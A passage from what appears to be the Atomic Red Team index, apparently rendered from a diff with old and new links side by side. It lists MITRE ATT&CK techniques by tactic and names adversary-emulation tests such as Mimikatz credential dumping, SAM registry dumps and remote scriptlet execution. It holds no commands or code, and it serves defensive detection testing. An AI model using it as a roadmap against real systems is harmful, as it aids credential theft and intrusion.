- [T1045 Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1099 Timestomp](./T1099/T1099.md)
|
||||
- Atomic Test #1: Set a file's access timestamp
|
||||
- Atomic Test #2: Set a file's modification timestamp
|
||||
- Atomic Test #3: Set a file's creation timestamp
|
||||
- [T1127 Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md)
|
||||
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
|
||||
- Atomic Test #1: MSBuild Bypass Using Inline Tasks
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
|
||||
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1102?T1102.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1102 Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# privilege-escalation
|
||||
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1134?T1134.md)
|
||||
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1015?T1015.md)
|
||||
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1182?T1182.md)
|
||||
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1103?T1103.md)
|
||||
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1138?T1138.md)
|
||||
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
|
||||
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md)
|
||||
- [T1068 Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1068?T1068.md)
|
||||
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md)
|
||||
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md)
|
||||
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
|
||||
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1068 Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1179 Hooking](./T1179/T1179.md)
|
||||
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md)
|
||||
- [T1178 SID-History Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1178?T1178.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md)
|
||||
- [T1166 Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1166?T1166.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md)
|
||||
- [T1169 Sudo](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1169?T1169.md)
|
||||
- [T1206 Sudo Caching](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1206?T1206.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1178 SID-History Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1166 Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1169 Sudo](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1206 Sudo Caching](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# discovery
|
||||
- [T1087 Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1087/T1087.md)
|
||||
- [T1087 Account Discovery](./T1087/T1087.md)
|
||||
- Atomic Test #1: List all accounts
|
||||
- Atomic Test #2: View sudoers access
|
||||
- Atomic Test #3: View accounts with UID 0
|
||||
- Atomic Test #4: List opened files by user
|
||||
- Atomic Test #5: Show if a user account has ever logger in remotely
|
||||
- [T1010 Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1010?T1010.md)
|
||||
- [T1217 Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1217?T1217.md)
|
||||
- [T1083 File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1083?T1083.md)
|
||||
- [T1046 Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1046/T1046.md)
|
||||
- [T1010 Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1217 Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1083 File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1046 Network Service Scanning](./T1046/T1046.md)
|
||||
- Atomic Test #1: Scan a bunch of ports to see if they are open
|
||||
- [T1135 Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1135?T1135.md)
|
||||
- [T1201 Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1201?T1201.md)
|
||||
- [T1120 Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1120?T1120.md)
|
||||
- [T1069 Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1069?T1069.md)
|
||||
- [T1057 Process Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1057?T1057.md)
|
||||
- [T1012 Query Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1012?T1012.md)
|
||||
- [T1018 Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1018?T1018.md)
|
||||
- [T1063 Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1063?T1063.md)
|
||||
- [T1082 System Information Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1082?T1082.md)
|
||||
- [T1016 System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1016?T1016.md)
|
||||
- [T1049 System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1049?T1049.md)
|
||||
- [T1033 System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1033?T1033.md)
|
||||
- [T1007 System Service Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1007?T1007.md)
|
||||
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1124?T1124.md)
|
||||
- [T1135 Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1201 Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1120 Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1069 Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1057 Process Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1012 Query Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1018 Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1063 Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1082 System Information Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1016 System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1049 System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1033 System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1007 System Service Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# credential-access
|
||||
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1098?T1098.md)
|
||||
- [T1139 Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1139/T1139.md)
|
||||
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1139 Bash History](./T1139/T1139.md)
|
||||
- Atomic Test #1: xxxx
|
||||
- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1110/T1110.md)
|
||||
- [T1110 Brute Force](./T1110/T1110.md)
|
||||
- Atomic Test #1: Brute Force Credentials
|
||||
- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1003/T1003.md)
|
||||
- [T1003 Credential Dumping](./T1003/T1003.md)
|
||||
- Atomic Test #1: Powershell Mimikatz
|
||||
- Atomic Test #2: Gsecdump
|
||||
- Atomic Test #3: Windows Credential Editor
|
||||
- Atomic Test #4: Registry dump of SAM, creds, and secrets
|
||||
- [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1081?T1081.md)
|
||||
- [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1214?T1214.md)
|
||||
- [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1212?T1212.md)
|
||||
- [T1187 Forced Authentication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1187?T1187.md)
|
||||
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
|
||||
- [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1187 Forced Authentication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1179 Hooking](./T1179/T1179.md)
|
||||
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md)
|
||||
- [T1141 Input Prompt](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1141?T1141.md)
|
||||
- [T1208 Kerberoasting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1208?T1208.md)
|
||||
- [T1142 Keychain](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1142?T1142.md)
|
||||
- [T1171 LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1171?T1171.md)
|
||||
- [T1040 Network Sniffing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1040?T1040.md)
|
||||
- [T1174 Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1174?T1174.md)
|
||||
- [T1145 Private Keys](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1145?T1145.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
|
||||
- [T1167 Securityd Memory](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1167?T1167.md)
|
||||
- [T1111 Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1111?T1111.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1141 Input Prompt](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1208 Kerberoasting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1142 Keychain](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1171 LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1040 Network Sniffing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1174 Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1145 Private Keys](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1167 Securityd Memory](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1111 Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# execution
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md)
|
||||
- [T1059 Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1059?T1059.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md)
|
||||
- [T1173 Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1173?T1173.md)
|
||||
- [T1106 Execution through API](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1106?T1106.md)
|
||||
- [T1129 Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1129?T1129.md)
|
||||
- [T1203 Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1203?T1203.md)
|
||||
- [T1061 Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1061?T1061.md)
|
||||
- [T1118 InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md)
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1059 Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1173 Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1106 Execution through API](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1129 Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1203 Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1061 Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1118 InstallUtil](./T1118/T1118.md)
|
||||
- Atomic Test #1: InstallUtil uninstall method call
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md)
|
||||
- [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md)
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1170 Mshta](./T1170/T1170.md)
|
||||
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
|
||||
- [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1086?T1086.md)
|
||||
- [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md)
|
||||
- [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
|
||||
- Atomic Test #1: Regasm Uninstall Method Call Test
|
||||
- Atomic Test #2: Regsvs Uninstall Method Call Test
|
||||
- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md)
|
||||
- [T1117 Regsvr32](./T1117/T1117.md)
|
||||
- Atomic Test #1: Regsvr32 local COM scriptlet execution
|
||||
- Atomic Test #2: Regsvr32 remote COM scriptlet execution
|
||||
- Atomic Test #3: Regsvr32 local DLL execution
|
||||
- [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md)
|
||||
- [T1085 Rundll32](./T1085/T1085.md)
|
||||
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md)
|
||||
- [T1035 Service Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1035?T1035.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md)
|
||||
- [T1153 Source](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1153?T1153.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md)
|
||||
- [T1127 Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1035 Service Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1153 Source](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
|
||||
- Atomic Test #1: MSBuild Bypass Using Inline Tasks
|
||||
- [T1204 User Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1204?T1204.md)
|
||||
- [T1047 Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1047?T1047.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md)
|
||||
- [T1204 User Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1047 Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# lateral-movement
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md)
|
||||
- [T1017 Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1017?T1017.md)
|
||||
- [T1175 Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1175?T1175.md)
|
||||
- [T1210 Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1210?T1210.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md)
|
||||
- [T1075 Pass the Hash](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1075?T1075.md)
|
||||
- [T1097 Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1097?T1097.md)
|
||||
- [T1076 Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1076?T1076.md)
|
||||
- [T1105 Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md)
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1017 Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1175 Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1210 Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1075 Pass the Hash](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1097 Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1076 Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: xxxx
|
||||
- [T1021 Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1021?T1021.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
|
||||
- [T1184 SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1184?T1184.md)
|
||||
- [T1051 Shared Webroot](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1051?T1051.md)
|
||||
- [T1080 Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1080?T1080.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md)
|
||||
- [T1077 Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1077?T1077.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md)
|
||||
- [T1021 Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
